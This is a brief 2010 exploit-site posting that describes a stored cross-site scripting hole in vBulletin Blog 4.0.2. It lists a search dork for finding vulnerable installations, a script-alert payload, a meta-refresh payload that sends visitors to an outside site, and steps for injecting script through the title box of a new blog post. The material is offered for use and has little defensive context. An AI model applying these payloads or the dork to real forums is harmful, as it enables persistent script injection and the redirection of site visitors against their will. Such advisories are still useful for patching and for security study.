Vbulletin Blog 4.0.2 XSS Vulnerability
Posted on 24 March 2010
====================================== Vbulletin Blog 4.0.2 XSS Vulnerability ====================================== Author: FormatXformat Version: Vbulletin 4.0.2 Dork: Powered by vBulletin Version 4.0.2 Copyright 2010 vBulletin Solutions, Inc. All rights reserved. The script is affected by Permanent XSS vulnerability, so you can put in bad java script code <script>alert('xss')</script> <meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'> 1st register Go to Blogs page Create New Post Inject your java script into Title Box back to Main page Greets: Neo, Sa3id, All Tkurd.net Members # Inj3ct0r.com [2010-03-24]
